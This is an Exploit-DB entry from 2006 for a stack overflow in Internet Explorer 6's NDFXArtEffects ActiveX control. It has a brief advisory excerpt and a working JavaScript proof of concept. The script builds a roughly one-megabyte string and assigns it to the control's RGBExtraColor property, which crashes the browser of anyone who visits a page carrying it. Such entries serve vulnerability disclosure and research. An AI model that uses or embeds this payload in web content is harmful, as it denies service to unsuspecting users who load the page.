Microsoft Internet Explorer 6 - NDFXArtEffects Stack Overflow

EDB-ID:

28286


Author:

hdm

Type:

dos


Platform:

Windows

Date:

2006-07-27


source: https://www.securityfocus.com/bid/19184/info

Microsoft Internet Explorer is prone to a stack-overflow vulnerability.

This issue is triggered when an attacker convinces a victim user to visit a malicious website.

Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.

var b = 'XXXX';
while(b.length <=1024*1024) b+=b;
var a = new ActiveXObject('DXImageTransform.Microsoft.NDFXArtEffects.1');
var i = 1016320;
a.RGBExtraColor = b.substring(0,i);